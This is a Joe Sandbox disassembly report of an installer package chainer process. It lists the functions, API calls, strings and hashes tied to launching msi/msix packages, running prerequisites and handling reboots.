Part of subcall function 000CB321: GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?), ref: 000CB346
Part of subcall function 000CB321: CloseHandle.KERNEL32(00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?,D11C52E5), ref: 000CB358

Part of subcall function 00088580: InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC
Part of subcall function 00088580: EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F

std::_Throw_Cpp_error.LIBCPMT ref: 0006B224
std::_Throw_Cpp_error.LIBCPMT ref: 0006B22B
std::_Throw_Cpp_error.LIBCPMT ref: 0006B232
std::_Throw_Cpp_error.LIBCPMT ref: 0006B248
GetCurrentThreadId.KERNEL32 ref: 0006B43E

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

std::_Throw_Cpp_error.LIBCPMT ref: 0006B54F
std::_Throw_Cpp_error.LIBCPMT ref: 0006B556
std::_Throw_Cpp_error.LIBCPMT ref: 0006B55D
std::_Throw_Cpp_error.LIBCPMT ref: 0006B564

Strings

Launching file:, xrefs: 0006A84A
Return code of launched file:, xrefs: 0006B116
Launch failed. Error:, xrefs: 0006B03A
msix, xrefs: 0006AA61
msixbundle, xrefs: 0006AAA8
appx, xrefs: 0006AC26
(, xrefs: 0006B168

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$File$Thread$BuffersCriticalCurrentFlushSectionWrite$CloseCodeEnterExitHandleHeapInitializeObjectProcessSingleSleepWait
String ID: ($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
API String ID: 257644201-1889611545
Opcode ID: 5bb6ce78df7de9dcfed6fd2e301b2851993d33329048150c22ef8faaf33f7ab4
Instruction ID: b3a41d75d673fff8c85c155cfbf7ed845ffa7f40de12f6b5ad0fe404509a85e6
Opcode Fuzzy Hash: 5bb6ce78df7de9dcfed6fd2e301b2851993d33329048150c22ef8faaf33f7ab4
Instruction Fuzzy Hash: 3092B070E00258DFDB24DF64CC55BEDB7B2AF45314F148299E419AB292EB70AE84CF91

Function 0007A1F0 Relevance: 28.6, APIs: 13, Strings: 3, Instructions: 551
filesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0007AE40: GetModuleFileNameW.KERNEL32(00000000,?,00000104,D11C52E5,?,000F0616,000000FF), ref: 0007AE92

FindFirstFileW.KERNELBASE(?,00000000,.ini,00000004,?,?,?,00000000,00000000,?,D11C52E5), ref: 0007A321
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A399
SetFilePointer.KERNELBASE(00000000,00000002,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A3E0
ReadFile.KERNELBASE(00000000,?,?,?,00000000,00000078,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A421
FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A472
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 0007A55B
SetCurrentDirectoryW.KERNELBASE(00000000), ref: 0007A786
OpenMutexW.KERNEL32(00100000,00000000,Global\_MSIExecute), ref: 0007A7B4
GetLastError.KERNEL32 ref: 0007A7CE
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0007A7F6
CloseHandle.KERNEL32(00000000), ref: 0007A80C
CloseHandle.KERNEL32(00000000), ref: 0007A83C
FindClose.KERNEL32(?), ref: 0007A889

Strings

Global\_MSIExecute, xrefs: 0007A7A8
2Wup1Wu, xrefs: 0007A321
.ini, xrefs: 0007A30F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$Close$Find$HandleModuleName$ChangeCreateCurrentDirectoryErrorFirstLastMutexNotificationObjectOpenPointerReadSingleWait
String ID: 2Wup1Wu$.ini$Global\_MSIExecute
API String ID: 2164323070-1607014661
Opcode ID: c96d329cb0ff05153b77911907a59d4a20bfca88539d13ab43cf7b371683755c
Instruction ID: 51015dc73fedfa247fef32f81d149f5bc12cb35536a421eb8ff212f435537fea
Opcode Fuzzy Hash: c96d329cb0ff05153b77911907a59d4a20bfca88539d13ab43cf7b371683755c
Instruction Fuzzy Hash: BD32D370A01649DFDB10DFA8CC48BEEBBF4BF45314F148258E419A72D2DB789A45CB91

Function 000A9360 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 269
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,00000004,00000000,00000000,?), ref: 000A950E
GetForegroundWindow.USER32(?,00000004,00000000,00000000,?), ref: 000A958A
ShellExecuteExW.SHELL32(?), ref: 000A9597
ShellExecuteExW.SHELL32(?), ref: 000A95C0
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId), ref: 000A95F5
GetProcAddress.KERNEL32(00000000), ref: 000A95FC
GetProcessId.KERNELBASE(?), ref: 000A9605
AllowSetForegroundWindow.USER32(00000000), ref: 000A9608

Strings

open, xrefs: 000A9548
/C ""%s" %s", xrefs: 000A9533
%s\System32\cmd.exe, xrefs: 000A951B
Kernel32.dll, xrefs: 000A95F0
runas, xrefs: 000A9553
.bat, xrefs: 000A9496
.cmd, xrefs: 000A94CF
GetProcessId, xrefs: 000A95EB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExecuteForegroundShellWindow$AddressAllowDirectoryHandleModuleProcProcessWindows
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
API String ID: 2271306907-986041216
Opcode ID: 75ccbcd6b7b1173cc6a3e6eb510007473b905986735e1956bcf3b501d1f69b26
Instruction ID: 567ece9e6008c72af242dfca03373a8bd5cda94552e30275fcb9b56b7a76d98b
Opcode Fuzzy Hash: 75ccbcd6b7b1173cc6a3e6eb510007473b905986735e1956bcf3b501d1f69b26
Instruction Fuzzy Hash: 64B1BE71A00249DFDB10DFE8C849BEEBBF5EF19314F108169E515EB292EB759A04CB60

Function 000827B0 Relevance: 16.6, APIs: 11, Instructions: 117
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000827F8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00082805
GetLastError.KERNEL32 ref: 0008280F
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000F1C95), ref: 00082839
GetLastError.KERNEL32 ref: 0008283F
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000F1C95,000F1C95,000F1C95,000F1C95), ref: 00082865
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00082898
EqualSid.ADVAPI32(00000000,?), ref: 000828A7
FreeSid.ADVAPI32(?), ref: 000828B6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 000828F0

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
String ID:
API String ID: 2037597787-0
Opcode ID: be44dfa3c22cb3a9b6695d2fb7485c12a12d72f84e664be029769974341833e9
Instruction ID: 525a653f6a80fe60b751bf24e3ae0ca44d0088732f5ec470eed2ad5a2703c444
Opcode Fuzzy Hash: be44dfa3c22cb3a9b6695d2fb7485c12a12d72f84e664be029769974341833e9
Instruction Fuzzy Hash: 3D413771901219EFEF209FA4CC49BEEBBB8FF08314F104119E551B22A0DB799945DBA4

Function 00087860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
GetSystemMetrics.USER32(0000000C), ref: 000878FC
GetSystemMetrics.USER32(0000000B), ref: 00087912
LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 00087921
FreeLibrary.KERNEL32(00000000), ref: 0008793F

Strings

ComCtl32.dll, xrefs: 00087892
LoadIconMetric, xrefs: 000878BB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoadMetricsSystem$AddressFreeImageProc
String ID: ComCtl32.dll$LoadIconMetric
API String ID: 1983857168-764666640
Opcode ID: 4b342644029e39c73765bb4ae59cf241c6296a5106145f38c4c3c812c527c363
Instruction ID: bb5a1479fe52cfdaaa20e83ecf31fcf1f218cb32292fb5f64f20b51c49acc166
Opcode Fuzzy Hash: 4b342644029e39c73765bb4ae59cf241c6296a5106145f38c4c3c812c527c363
Instruction Fuzzy Hash: F4319571904259ABEB109F95CC48BAFBFF8FB48350F10416AF959E72D0DBB98900DB90

Function 0007C450 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,D11C52E5,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C4C7

Part of subcall function 000842C0: _wcsrchr.LIBVCRUNTIME ref: 000842F9

Part of subcall function 00084940: _wcsrchr.LIBVCRUNTIME ref: 00084A01

FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C63F
FindNextFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C677
FindClose.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C682
PathIsDirectoryW.SHLWAPI(00000000), ref: 0007C6B5

Strings

p2Wu3Wu, xrefs: 0007C677
2Wup1Wu, xrefs: 0007C63F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileFind$_wcsrchr$CloseDeleteDirectoryFirstNextPath
String ID: 2Wup1Wu$p2Wu3Wu
API String ID: 1628590722-4124002120
Opcode ID: 11cc2a304ae2a231c6010012ec3105d8633456e76f7f73ea4e3cb61bb793efc3
Instruction ID: 6aa908a9058f669503e1ae04bab939b103fce2051e1fd140ca59bbce44c17381
Opcode Fuzzy Hash: 11cc2a304ae2a231c6010012ec3105d8633456e76f7f73ea4e3cb61bb793efc3
Instruction Fuzzy Hash: 15919171D006159FEB14DF78C885BEEBBF4BF09320F10822DE429A7291DB78A945CB94

Function 0006B830 Relevance: 9.4, Strings: 7, Instructions: 665COMMON

Download Yara Rule

Strings

/i , xrefs: 0006BD64
, xrefs: 0006BFDF
msiexec.exe, xrefs: 0006BD8B
.msi, xrefs: 0006BAE6
\\?\, xrefs: 0006BC4E, 0006BCED
, xrefs: 0006B9BE
"%s" , xrefs: 0006BE9A

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FindHeapProcessResource
String ID: $ $ /i $"%s" $.msi$\\?\$msiexec.exe
API String ID: 3983090888-2815711023
Opcode ID: ec539e556cfe6a9f37a34a309995229bcc1d98815c74adbb256c15fceb7ae546
Instruction ID: 70700fa0235ea502dde278b8f3c14c9aa58819fcb55897d6b186e5a3e9ccc149
Opcode Fuzzy Hash: ec539e556cfe6a9f37a34a309995229bcc1d98815c74adbb256c15fceb7ae546
Instruction Fuzzy Hash: A752F171D00259CFDB24DBA8CC55BEDB7B2AF55304F1482ACE445AB292EB706F84CB91

Function 00091870 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00091B40: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00091CA3
Part of subcall function 00091B40: GetProcAddress.KERNEL32(00000000), ref: 00091CAA

FindFirstFileW.KERNEL32(?,?), ref: 000919A2
FindClose.KERNEL32(00000000), ref: 000919D0
FindClose.KERNEL32(00000000), ref: 00091A59

Strings

2Wup1Wu, xrefs: 000919A2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$Close$AddressFileFirstHandleModuleProc
String ID: 2Wup1Wu
API String ID: 3469240197-403849135
Opcode ID: 52b91a0f6f22709c01aa1f70a7072cf129533c55b4929fd5512da9642d4fbe10
Instruction ID: f63a9dbb1aa1b057dbf32e7857e920ab12d3103850416134d379f752babc2e66
Opcode Fuzzy Hash: 52b91a0f6f22709c01aa1f70a7072cf129533c55b4929fd5512da9642d4fbe10
Instruction Fuzzy Hash: 08819030A05516DBDF60DF28C988BEAF7F5AF45320F1483A9D429972A1DB309D81DF91

Function 00084AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 00084B8D
FindClose.KERNEL32(00000000,?,?), ref: 00084BEC

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Strings

2Wup1Wu, xrefs: 00084B8D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID: 2Wup1Wu
API String ID: 1673784098-403849135
Opcode ID: 6ec6bea6ce7b549b985c229c49bc175a8bc32e32e01319ed34fa59b43bc0f577
Instruction ID: 64353f4693f755c0cd1960f9008abfd3054306f5652a19920d01a6d779ac7092
Opcode Fuzzy Hash: 6ec6bea6ce7b549b985c229c49bc175a8bc32e32e01319ed34fa59b43bc0f577
Instruction Fuzzy Hash: 9031F131905619DBDB74EF54C888BAEB7F8FB08320F20469DE959A3380DBB49D44CB80

Function 000CA3DA Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
HeapAlloc.KERNEL32(00000000), ref: 000CA3E6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000CA42C
HeapFree.KERNEL32(00000000), ref: 000CA433

Part of subcall function 000CA278: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,000CA422), ref: 000CA29C
Part of subcall function 000CA278: HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA2A3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: d85132442feb3df3eb9c93a279c0586534a25a23632ed85258915e19c9dd09e2
Instruction ID: 77a119e974ae20f7a6b8a87268b6ee92e67212e32772e6f363c25639efd952e0
Opcode Fuzzy Hash: d85132442feb3df3eb9c93a279c0586534a25a23632ed85258915e19c9dd09e2
Instruction Fuzzy Hash: 8DF0243270425197EB6427BCBC0CFAF2A54EFC2750700402CF402C31A0DF64C881D762

Function 0009C060 Relevance: 4.9, APIs: 3, Instructions: 388registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

RegCreateKeyA.ADVAPI32(80000001,00000001,?), ref: 0009C0CE
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0009C0E6

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0009C3A4

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$AllocateCreateOpenProcessValue
String ID:
API String ID: 1583728613-0
Opcode ID: 46f343eda1f73a12cc4790e51ee66b2a62ab48478264202b8d6da62f86d7f0ee
Instruction ID: 89ff4f508c1e90cfcf38f7e37f54db706a360aca59993f0f28d599d776d60c15
Opcode Fuzzy Hash: 46f343eda1f73a12cc4790e51ee66b2a62ab48478264202b8d6da62f86d7f0ee
Instruction Fuzzy Hash: 90D1A272E002099FDB10CFA8C845BEEB7F9FF49320F14826AE915E7291DB759905CB90

Function 000AEAE0 Relevance: 1.6, APIs: 1, Instructions: 95comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00109F6C,00000000,00000001,0011160C,000000B0,D11C52E5,00000098,00000000,00000000,000000A0,-00000010,000FA61C,000000FF,?,000A8361), ref: 000AEC39

Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881

Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionCreateInstanceVariableWake
String ID:
API String ID: 3308385226-0
Opcode ID: 6e94f436957c0d9a3e74543e62f1bc3873aa6c14c19d44250cf62e24aee0a240
Instruction ID: 860720f727fefc5f71dae84affc44d8c37bf0bb26e22534bf120fa6ede14f6cf
Opcode Fuzzy Hash: 6e94f436957c0d9a3e74543e62f1bc3873aa6c14c19d44250cf62e24aee0a240
Instruction Fuzzy Hash: 5141DC71208384EFE724DF54DC85B8ABBB0FB05B20F244258E2149BAE1C3B56891CB54

Function 0007B440 Relevance: 46.3, APIs: 16, Strings: 10, Instructions: 755
threadregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Part of subcall function 0006C7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C7DD
Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C80E
Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,8000000B,D11C52E5,?,?), ref: 0006C845

CreateThread.KERNELBASE(00000000,00000000,Function_00047F90,00000000,00000000,00000000), ref: 0007B59C
GetLastError.KERNEL32 ref: 0007B5A9

Part of subcall function 00098490: GetCurrentThreadId.KERNEL32 ref: 00098499
Part of subcall function 00098490: DestroyWindow.USER32(00000005), ref: 000984A8

WaitForSingleObject.KERNEL32(?,?), ref: 0007B5CF
GetExitCodeThread.KERNEL32(?,00000000), ref: 0007B5E9
TerminateThread.KERNEL32(?,00000000), ref: 0007B601
CloseHandle.KERNEL32(?), ref: 0007B60A
GetActiveWindow.USER32 ref: 0007B96E

Part of subcall function 00088580: InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC
Part of subcall function 00088580: EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F

SetLastError.KERNEL32(0000000E), ref: 0007B98B
CloseHandle.KERNEL32(?), ref: 0007B9A6
GetCurrentThreadId.KERNEL32 ref: 0007B9C4
EnterCriticalSection.KERNEL32(0012BCD4), ref: 0007B9E1
LeaveCriticalSection.KERNEL32(0012BCD4), ref: 0007BA04
DialogBoxParamW.USER32(000000D8,00000000,Function_00038810,00000000), ref: 0007BA21
CloseHandle.KERNEL32(?), ref: 0007BA3E
CloseHandle.KERNEL32(?), ref: 0007BA76
RegDeleteKeyA.ADVAPI32(80000001,?), ref: 0007BD67

Strings

After running prerequisites we have:, xrefs: 0007BB04
Reboot was required=, xrefs: 0007BB10
Starting installing prerequisites in basic UI mode., xrefs: 0007B84B
Reboot in Progress=, xrefs: 0007BC63
true, xrefs: 0007BAD1, 0007BB3F, 0007BB40, 0007BBF1, 0007BC92, 0007BC93
false, xrefs: 0007BAD6, 0007BBCB, 0007BC71
No prerequisite must be installed., xrefs: 0007B686
Reboot was refused=, xrefs: 0007BBBA
Starting installing prerequisites in silent mode., xrefs: 0007B76A
InterbootContext, xrefs: 0007B499, 0007B4A7

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCriticalFileHandleSection$BuffersByteCharCurrentEnterErrorFlushLastMultiWideWindowWrite$ActiveCodeCreateDeleteDestroyDialogExitFindHeapInitializeLeaveObjectParamProcessResourceSingleTerminateWait
String ID: Reboot in Progress=$ Reboot was refused=$ Reboot was required=$After running prerequisites we have:$InterbootContext$No prerequisite must be installed.$Starting installing prerequisites in basic UI mode.$Starting installing prerequisites in silent mode.$false$true
API String ID: 2893576875-478559164
